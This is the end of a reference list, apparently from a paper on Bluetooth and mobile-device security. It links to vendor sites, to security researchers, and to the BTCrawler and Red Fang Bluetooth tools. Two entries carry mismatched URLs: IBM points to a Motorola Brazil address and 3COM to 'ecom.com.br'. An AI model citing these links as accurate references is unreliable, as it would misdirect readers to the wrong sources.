
    [9] http://www.noconname.org/ponentes/olliewhitehouse.htm

    [10] SONY ERICSSON - URL: http://www.sonyericsson.com

    [11] MOTOROLA - URL: http://www.motorola.com.br

    [12] LINUX URL: http://br-linux.org/

    [13] INTEL - URL: http://www.intel.com

    [14] IBM - URL: http://www.motorola.com.br

    [15] TOSHIBA - URL: http://www.toshiba.com

    [16] MICROSOFT - URL: http://www.microsoft.com

    [17] TOYOTA - URL: http://www.toyota.com

    [18] BMW - URL: http://www.bmw.com

    [19] LEXUS - URL: http://www.lexus.com

    [20] ERICSSON - URL: http://www.ericsson.com

    [21] APPLE - URL: http://www.apple.com

    [22] DELL - URL: http://www.dell.com

    [23] HP - URL: http://www.hp.com

    [24] 3COM - URL: http://www.ecom.com.br

    [25] LUCENT - URL: http://www.lucent.com

    [26] ADAM LAURIE - URL: http://trifinite.org/trifinite_group_adam.html

    [27] NOKIA URL: http://www.nokia.com

    [28] IDC - URL: http://www.idclatin.com/brasil/

    [29] PARABEN - URL: http://www.paraben.com

  • 56

    [30] HOME OF BTCRAWLER - A BLUETOOTH DIAGNOSTIC TOOL URL:

    http://www.silentservices.de/btCrawler.html

    [31] RED FANG BLUETOOTH TOOL

    http://www.netstumbler.com/2003/08/18/software_tool_steals_data_via_bluetooth/

Recommended

View more >